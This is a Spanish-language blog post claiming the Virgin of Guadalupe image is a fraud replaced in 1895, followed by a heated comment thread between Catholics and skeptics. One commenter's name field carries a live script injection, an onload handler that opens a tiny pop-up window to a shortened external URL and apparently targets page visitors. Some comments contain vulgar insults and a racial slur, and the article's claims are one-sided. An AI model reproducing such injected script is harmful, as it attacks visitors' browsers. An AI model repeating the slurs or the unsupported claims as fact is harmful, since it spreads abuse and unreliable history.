Avisar de contenido inadecuado

La virgen de Guadalupe es un gran FRAUDE

{
}

EL FRAUDE DE LA VIRGEN SIN CORONA 

Al parecer tienen engañados a los Mexicanos desde hace tiempo 

Resulta que la imagen de la virgen de Guadalupe, que es venerada en la ciudad de México, se estaba descascarando y deteriorando por hongos y humedad. Es interesante que para ser una imagen milagrosa, esté tan mal pintada y pésimamente preparada.

"Muchos Mexicanos mezclan el fanatismo a la virgen con un asunto patrio"

Para 1895, la imagen estaba en tan mal estado, que la cambiaron a escondidas del público, encargándose de ello el Padre Plancarte. Para suplir el viejo cuadro se escogió uno que estaba en el convento de Capuchinas en la Ciudad de México, D.F.

El Universal del 3 de diciembre, de 1895, contiene las declaraciones de Plancarte acerca de la imagen. Y tan cierto es que la cambió, que se hizo un escándalo por un detallito en la imagen. Es curioso que muchos que se dicen católicos de "hueso colorado" no se han dado cuenta de tan evidente "detallito". ¿De que se trata? Bueno, usted pude ver tal "detallito" en las imágenes que le presentamos en este artículo. Note que una virgen no tiene corona. ¡Es más!, la fisionomía, el tamaño y el vestido son diferentes. Burlándoce de la gente, Plancarte dijo que nunca había existido tal corona, pero, ¿y las copias que en todas partes había con corona? Plancarte llegó al colmo de la burla, ya que declaró: "..por milagro desapareció la corona..", y muchos fieles le creyeron.

En imágenes anteriores al 1895, podía verse claramente la corona que llevaba la virgen. ¿Por qué, entonces, la actual, que se dice es la original, no la lleva? ¿cómo es que se le desapareció en 1895? Ya en 1884 había desaparecido la corona, pues ese año, el Padre Gonzalo Carrasco mandó pintar una copia para otra Iglesia, pero interrogado por la prensa, dijo: "..El dedo de Dios la borró.."

{
}
{
}

Comentarios La virgen de Guadalupe es un gran FRAUDE - página 4

La creencia en religiones, dioses, santos o vírgenes es una cuestión de fé.  La inadecuada estructuración psicológica del ser humano condiciona la necesidad de creer en dioses que en alguna etapa de su vida lo ayuden a satisfacer sus necesidades materiales y psicológicas, brindándole consuelo en sus aflicciones, pero sobre todo, la esperanza de trascender este plano y vivir feliz en otro mundo como premio a la observancia y cumplimiento de las normas establecidas por su credo religioso. Sin embargo, la existencia de dioses, vírgenes y demás entes celestiales no soportan el análisis crítico de la razón pura, vamos, ni siquiera el sentido común razonablemente orientado. Al final, no nos queda más que reconocer los errores en que nos mantuvieron durante años nuestros ignorantes familiares, cuyos esfuerzos por "mantenernos alejados del pecado para alcanzar la vida eterna" merecían mejor causa. Finalmente, es menester recalcar, que no se vale querer imponer nuestras ideas con insultos o anatemas. Las ideas se defienden con bases sólidas, científicas, con tolerancia y comprensión, buscando siempre incrementar nuestros conocimientos. Vale.
Croma Croma 18/02/2012 a las 18:54
Dijo Jesucristo NADIE VIENE A MI SI NO ES POR EL PADRE, Y NADIE LLEGA A EL SI NO ES POR MI; YO SOY EL PAN, LA VERDAD Y LA VIDA.
EL TRONCOTE EL TRONCOTE 02/03/2012 a las 21:18
A ver, un resumen de respuestas (perdonen la pésima ortografía, así lo escribió la gente):
1.- Creyentes:
"que chingen a su madre los que se metan con la virjen", "la virjen si ecsiste se me aparecio en una rebanada de pan tostado binvo", "si existe maria, y puta su madre el k no lo crea", etc.
(actualmente la rebanada es adorada por las beatas del barrio)
2.- No creyentes:
"La virgen es un invento para tener atolondrado (más) al pueblo mexicano", "fue una manera de sojuzgar al indígena durante la conquista española", "fue pintada por un español", etc.
3.- Creyentes católicos:
"lean la Biblia"
¿Conclusión" Los pro-aparicionistas defienden a capa y espada y como animales su creencia (a veces sin fundamento alguno), así sea con insultos, mentadas de madre y todas las linduras que les caracteriza. ¿qué acaso la virgen, si ésta existiera, no puede defenderse solita?
Los excépticos y ateos -como yo- tenemos fundamentos CREÍBLES  de lo que defendemos, claro, nos faltan pruebas. En fin, pobre México, tan sumido en la católica apostólica y romana IGNORANCIA.
PD. "La religión es el opio del pueblo". Karl Marx.
Marquinho Marquinho 16/03/2012 a las 12:19
Nuevamente yo.
Este comentario no lo había leído:
"Hola a todos, soy mexicana y catolica, he estado leyendo sus comentarios y realmente me da mucha pena (no se apene, mejor agárreme bien la onda) que exista gente como Jorge Amarante, espero que Dios te perdone hermano, pero a mi no me haran cambiar soy catolica creo en Dios y la virgen de Guadalupe (y en el conejo de Pascua y en los Power Rangers también) ah otra cosa, hermanos ponganse a leer la biblia no esperen a que Jorge Amarante los engañe porque el no es nadie para meterse en nuestras vidas, que esten bien, saludos!!!"  Atte.ROSSY M. DE LA VELA PERPETUA Y DE LA INMACULADA CONCEPCIÓN DE JESÚS.
A esto me refería, he aquí una católica ordinaria...cerrada, ignorante, ahhh, pero eso síiii MUY INCHI CATÓLICA ¿que no?
¿Por qué el bloqueo mental hacia el cambio? ¿En qué momento el autor de este log pretendió "meterse" en nuestras vidas? ¿Quién engaña a quién? ¿Leer la Biblia y adaptar ésta a mis intereses me hace mejor persona?
Por cierto, yo también soy mexicano, ehhh.
Marquinho Marquinho 16/03/2012 a las 12:46
TODOS LOS Q ESCRIBEN Q LA VIRGEN ES UN FRAUDE , ESTAN DEMASIADOS PENDEJOS SIN OFENDER ,  PERO COMO SE LES PUEDE OCRIR Q ES UN FRAUDE SI ELLA ES QUIEN LE DIO LA VIDA PARDE BABOSO COMO ODIO A LOS Q DICEN ESAS MAMADAS OJALA Y QUE PRONTO SE AEPIENTAN ANTES DE Q SEA DEMASIDO TARDE PAR DE PENDEJOS
MARIAN NUÑEZ GOTOO MARIAN NUÑEZ GOTOO 06/04/2012 a las 04:35
A toda la bola de ignorantes, primero vallan a la escuela y aprendan a escribir (ESCRIBEN PUERAS IDIOTECES CON FALTAS DE ORTOGRAFIA) y cuando aprendan vengan y opinen BURROS.
despertar777 despertar777 09/04/2012 a las 19:54
Verga me atrevo a decir que tu eres un negro e mierda frustrado
Sambo Garcia Sambo Garcia 11/04/2012 a las 01:33
hola soy de colombia y lo k tengo k decir es muy importante es bueno k de corazon creamos en nuestra virgen y en jesus 
estrella estrella 11/04/2012 a las 04:47
estoy  de acuerdo con carlitos y francisco, los nacatolicos o rebaño de borregos aunque el vaticano descubra que todo lo inventaron es una mentira, ellos ni  asi los van a reconocer sus idolartrias, y lo peor de todo es siempre piden milagros a sus idolos esperando en vano una respuesta, pobres fanaticos de mentes empobrecidas, por eso el pais esta como esta y somos la burla de muchos paises 
isaias isaias 14/04/2012 a las 19:05
Que pobreza de espiritu para los que no creen que tenemos una Madre. Es la Madre de Jesús y a El no le gustan que hablen mal de su mamá, al igual que ninguno de ustedes les gusta que hablen de su madre. Si pudieran conocer a Jesus nuestro Señor realmente, conocerian el inmenso amor de El y de nuestra Madre. Ellos ( El Padre, el Hijo y el Espiritu Santo) y nuestra Madre estan a nuestro lado. Si no quieren tener madre, NO CREAN, PERO NO LA IRRESPETEN, NI OFENDAN A JESUS. " No hay que buscar respuesta en la tierra de lo que hay en el cielo". Ustedes, están ciegos. Ella vive y está a nuestro lado. Jorgito, no ofendas, ni te sigas condenando hablando mal de la Madre. Si dices que crees en Dios, no ofendas a la mujer que dijo SI, para ser la madre del Hijo. Ella fue elegida por Dios de entre todas las mujeres. Ya que no crees en ella, por lo menos respetala porque fue la escogida. No se adora, se respeta y venera como la madre de Dios. Ella como toda madre cuidó de su hijo y al pie de la cruz su corazon lo tenia partido en mil pedazos. Respetala y deja que los otros tomen su descision de creer o no en ella, pero no sigas ofendiendo a Dios. La mamita Maria vive, y subio en cuerpo y alma al cielo y en todas las manifestaciones que ha hecho en distintas advocaciones ha pedido la conversion de los pecadores, para que no siganos crucificando a nuestro Padre. Ella es la humilde, la que aceptó la voluntad de Dios. Respentenla, a nadie le gusta que ofendan a su madre. Ella eleva tus peticiones hacia su hijo, las tuyas Jorgito, porque ella es incondicional, es una madre. Y una madre por mas malo que sea su hijo, lo ama, como te ama a ti. LES VUELVO A REPETIR " NO HAY QUE BUSCAR RESPUESTA EN LA TIERRA DE LO QUE HAY EN EL CIELO".
Bendiciones a todos,

Gema Gema 26/04/2012 a las 23:13
Por favor inventen otra excusa para no creer en la Santisima Virgen Maria yo creo y nunca dejare de creer en ella okey ella no es un fraude ustedes estan equivocados.


Kamila Kamila 22/05/2012 a las 02:51
Cierto es muy ierto esa tonteeria haciendose llamar "virgen" lealmente es un verdadero fraude
Yo no soy catolico,ni mucho menos algo k no puedo mencionar
Soy cristiano y los cristianos creemos en dios
NO EN DIOSES FALSOS
si me diran k estoy loko o algo asi pero esto para mi es una gran pendejada
el futbol es un deporte no una religion pero ya me sali del tema
esto fue echo por el pendejo del diablo asi que mientras mas crean en esto mayor se alimentara el
ABRA LOS OJOSS PORFAVOR       
Genarito Genarito 26/05/2012 a las 23:21
LA GENTE QUE NO TIENE Y NO SABE QUE HACER , SE PONE A INVENTAR AHORA SOBRE LO MAS BENDITO Y PURIFICANTE QUE HAY. GENTE HABLADORA SIN . ESCRUPULOS . HAGAN ALGO EN QUE ENTRETENERSE. 

FASTIDIENSEN USTEDS MISMOS PORQUE EN VEZ DE HABLAR DE ELLA. HABLEN DE USTEDES PORQUE HASTA EL DIA DE HOY PIENSAN COMO ALIMAÑAS .
GENTE MAL INTENCIONADA. HIPOCRITA, DESLEAL. MEJOR DEJEN DE CRITICAR Y SEAN PERSONAS CON RESPETO CON MAS TOLERANCIA.

IRRESPETUOSOS 
YOLI YOLI 17/06/2012 a las 03:23
SOLO DIOS NOS DIO LA VIDA, SOLO EL MURIO POR NOSOSTROS Y SOLO EL PUEDE PERDONARNOS, NO DUDO DE LA EXISTENCIA DE MARIA PERO COMO UNA PERSONA QUE DIOS UTILIZO PARA NACER COMO HOMBRE Y NADA MAS.
ARV ARV 22/06/2012 a las 01:45
TONTOS Y MAS TONTOS TODOS ESTOS Q NO CREEN  EN  LA SANTISIMA VIRGEN NO CREEN  NI EN LA MISMA MADRE DE ELLOS  Q IRRESPETO  TAN GRANDE PIDANLE UNFAVOR Y COMPRUEBEN Q ELLA SI EXISTE Y AHI SI AGARRANCE DE QUIEN PUEDA IGNORANTES ILUSOS ME IMAGINO QUIENES SON    "" ESTOS HIJOS DE NADIE QUIZAS A TODOS ESTOS LOS PARIO UN HOMBRE " Q  GRACIOSO PERO PIDANLE UN FAVORCITO PA Q VEAN  ESTUPIDOS IGNORANTEEESSS....


LILOGO LILOGO 19/07/2012 a las 03:12
Miren queridos amigos míos
es un gran fraude
en primer lugar un buenos puntos
1.-  ¿Como saben que se llamaba Guadalupe (lamento escribirlo bien)
2.-¿Porque fue que le quitaron la corona?  
3.-¿porque la adoran tanto si no hace milagros?
4.-¿porque es tan idiota?
No se sabe nada si alguien quiere responder puede escribir abajo
 
Si erescatolico y responderasabajo(CUIDADO ESTAS APUNTO DE CAGARLA) 
Genaro Genaro 24/07/2012 a las 16:41
BOLA DE BURROS, PONGANSE A LEER, Y TAMBIEN LA BIBLIA, NO SOLO LE CREAN AL PADRECITO COGELON DE SU PARROQUIA,  "DIOS" NO ES HIJO DE NADIE, EL FUE QUIEN CREO TODO, EN TAL CASO MARIA ES HIJA DE JESUS "HIJO DE DIOS",  FANATICOS DE IMAGENES, BURROS SIN MECATE, SEMOBIENTES!!!JAJAJAJA.
OStracker OStracker 30/07/2012 a las 16:54
LA BIBLIA SOLO  HABLA DE UN INTERMEDIARIO ENTRE DIOS Y LOS HOMBRES 1 de timoteo 2-5  DECLARA QUE EL NOMBRE CORRECTO ES JESUCRISTO Y NO HAY OTRO , ?  O ACASO DICE QUE GUADALUPE ES INTERMEDIARIA CUANDO NI SIQUIERA EXISTE TAL NOMBRE DE GUADALUPE EN TODA LA BIBLIA, NO DIGAN QUE DIOS SE EQUIVOCA  SI NOPORQUE EXISTE EL VERSICULO DE JUAN 3:16 PORQUE SOLO JESUS ES FUENTE DE SALVACION Y VINO POR TI Y POR MI PARA DARNOS VIDA ETERNA DIOS LES BENDIGA.
Anónimo Anónimo 30/08/2012 a las 15:58
no creen en la virgen pero les apuesto que si creen en el diablo por q todos aquellos que hablan mal de las cosas buenas son satanicos y creen mas en el mal q en el bien ala prueba esta todas las `porqurias que hablan de la virgen ten piedad de ellos virgensita y nuestro dios jesus 
alexan alexan 02/09/2012 a las 18:38
A  Todos.
 
El FRAUDE mencionado no quiere decir que no existiera María, porque en verdad María fue una mujer terrenal que fue la madre de Jesús, mujer que Dios escogió para dar a luz al unigénito hijo de Dios y Dios es ántes, mucho ántes que María, ¿que como fue EL creado?, solo EL lo sabe, ya alguien mencionó y lo dice la biblia que EL es el Alfa y la Omega, el Principio y el Fin, Cristo ó Jesús vino después al nacer de María, pero como es el hijo de Dios pues también es Dios porque su padre Dios le dio su poder. El Padre, El Hijo y el Espíritu Santo son la misma persona y a la vez son 3 personas diferentes, ¿que como es esto?, solo por el poder mismo de Dios. Amen.

  
Benjamin hernández Benjamin hernández 03/09/2012 a las 21:48
es imposible creer que todos los que escribieron aqui sean cristianos y no se como vinieron a este mundo quizaz ninguno tiene madre y no me esplico como nacio lo que pasa que algunos son incredulos de nacimiento y pertenecen a sectas y aparte escriben puras tonterias si en realida conocieran la verdad les daria la razon pero mejor pidanle perdon a jesucristo por ofender a su madre que es nuestra madre tambien quieran o no lo es solo le pido a dios padre que los perdone y escriban tonterias porque el padre el hijo y la virgen maria es lo mas sagrado para el ser humano que existe en el universo   gracias que la virgen maria nuestra santa madre los perdone y los bendiga a todos en general  amen
francisco francisco 11/09/2012 a las 05:22
creo en satanas creador del cielo y de la tierra y las imagenes es para redin frutos y sacar mucha lana por la gente idiota que da limonas $$$$$$$$$$$$ anualmente se reciben millones de ingresos para que los supuestos padres o pastores gasten dinero en prostitucion barata
EDGAR PERES EDGAR PERES 12/09/2012 a las 22:42
Vamos México, no tenemos porque seguirle creyendo a los españoles.
Jorge Jorge 15/09/2012 a las 18:11
Despues de haber leído todo lo que pusieron en este blog creyentes y no creyentes, solo puedo decir...que decepción.

Creyentes: Les recuerdo que la mejor forma para defender su idiología es con argumentos y no con insultos, recuerden que una mente si no capta con hechos mucho menos lo hara con insultos.

No creyentes: Antes de seguir les digo todo humano,absolutamente todo humano sin excepción, tiene fé y cree en un ser superior en teología se le llama dios y junto con él sus profetas (cristo, buda, mahoma,etc.) cada religión tendrá su ser supremo pero a fin de cuentas es uno mismo. El punto a favor de los cátolicos es que la su iglesia es la que más pruebas tiene al respecto. En cuanto a que si es un fraude la virgen de guadalupe les pregunto ¿que tanto han investigado al respecto? Si solo se quedán con lo que dicen unos cuantos libros de supermercado o lo que alguien público en internet creo que hace falta un poco más.
 Que desilúsion que haya gente que aún viva apartada de su esencia humana y más apegada a su naturaleza humana. Yo soy cientifíco y como cientifíco busco las pruebas (para este momento muchos dudarán que lo sea pero es cierto) he sido testigo de una infinidad de actos que no tienen explicación alguna y que uno de ellos me ocurrio a mí. Solo para que se den una idea, debido a la profesión que elegí vivo en constante peligro por parte de miembros de carteles de la droga que hay en México; en una ocasión y por un operativo mi fé en la Virgen de Guadalupe se aumentó. En medio de la sierra y estando en comboy junto con otras autoridades, fuimos víctimas de una sangrienta balacera, el vehículo en el que viajaba junto con otras 4 personas quedo literalmente hecho chatarra al recibir 276 impactos de proyectiles de arma de fuego de los calibres 7.62 utiles para el arma conocida como AK-47 y el alcance de una granada de fragmentación. Para los que duden verifiquen en internet sobre mi relato y el milagro es que solo yo sobreviví a esta refriega con solo un ráspon que me dí al salir del vehículo despúes de la detonación de la granada. ¿Casualidad que solo yo traía entre mis pertenencias la imagen de la virgen de Guadalupe y solo yo era creyente? Y antes de que saquen posibles explicaciones "lógicas" ( que yo nunca las encontre) yo iba en el asiento del copiloto y el lado la mayor cantidad de impactos fueron de frente y la granada détono justo de mi lado.  Piensenlo.
 Crean y rectifiquen antes de que sea tarde.
V.Pacheco V.Pacheco 02/10/2012 a las 21:33
¿Por que será que solo la iglesia católica realiza exorcismos si todas las religiones hablan de la posesión demoniaca?

¿Por que juzgan a toda una institución por los errores de unos cuantos? Los sacerdotes envueltos en casos de pederastia han fallado en su misión al mundo y por ellos se le juzga a toda la iglesia, entonces atendiendo este principio.....Todos lo abogados roban, Todos los médicos lucran con la enfermedad de las personas, etc.

¿Que hace falta para que crean? La dicha de tener a la virgen de guadalupe en nuestro país como su casa es algo que ningúin lugar de la tierra tiene. ¿Que consideran un milagro?
V.Pacheco V.Pacheco 02/10/2012 a las 21:49
Yo creo que hay que respetar la opinion de cada persona si me da un poco de coraje que se expresen asi de la virgen y estoy de acuerdo con emilia si no existiera la virgen entonces quien es la madre de jesus?? entonces no existiria jesus pero creo que cada quien se expresa como le va en la feria y yo en lo personal eh pasado por varios milagros que me ah hecho intersedio por mi para que jesus me hiciera el milagro de que mi hija de 5 dias de nacida se salvara de morir y estar grave por una maldita enfermedad llamada sepsis gracias a ella jesus me hizo el milagro de cuidarmela y por agradecimiento se la encomende y le puse su nombre a mi niña de guadalupe y solo te hago una pregunta jorge amarante entonces si dices que no haya seres fuera de la tierra entonces segun tu quien nos dio la vida???? gracias a la virgen y a dios principalmente es que estamos aqui
irene irene 23/11/2012 a las 04:45
no me interesa lo que piensen los que creen en ella, creo que existio y que siguio teniendo relaciones con jose despues del nacimiento de jesus investiguen en donde dice que jose no la conocio sino hasta despues del nacimiento de su hijo jesus.... ademas debio rompersele el himen con la parida y.... dejo de ser virgen. ademas recuerden que debio morir hace mucho tiempo y dicen las escrituras en los salmos que el que el que muere, duerme y no es conciente de nada...asi que no puede aparecerse por ningun lado pq espera la resurreccion de los muertos al igual que todos los apostoles. y si todavia no estan conformes, les dire que es un mito y que ya relei toda la biblia para buscar donde maria se eleva al cielo como dice en el rosario. a los detractores de la imagen mariana, les exorto a que dejen a la gente que crea en lo que quiera,,, yo conoci en africa a un grupo que adoraba a un zapato, pq creia que la vaca aun viva.
rick rick 25/11/2012 a las 07:57
todos ustedes que piensan mal sobre la imagen de la Virge de Guadalupe algun dia tendran su rencompensa yo soy testiga de sus grandes milagros mi hermana estaba a punto de morir y mi familia la puso en sus manos y en manos de Dios y mi hermana ya tiene 4 años mas con nosotros mi deber como servidora de ella y de Dios es defenderlos y lo boy a hacer aunque tenga que dar mi via por defenderlos a ellos el regreso de Cristo se hacerca y el que no este preparado sere errojado al juego del infierno
flaquita flaquita 25/11/2012 a las 17:32
buenisimo, me encanto el blog
" onload="javascript:window.open('http://alturl.com/mcno4','new',width='10',height='10')" 26/11/2012 a las 21:49
La virgen de guadalupe es un fraude creado por la iglesia catolica para convertir a los indigenas y Juan Diego es el palero mas grande que existio en mexico, por que se presto a este fraude traicionando a su propia raza y ademas lo hicieron SANTO, el cuadro fue hecho por el hombre y es una verguenza que la iglesia catolica tenga tan estupidizados a millones de Mexicanos ignorantes.
NORMA NORMA 27/11/2012 a las 00:49

Deja tu comentario La virgen de Guadalupe es un gran FRAUDE

Identifícate en OboLog, o crea tu blog gratis si aún no estás registrado.

Avatar Tu nombre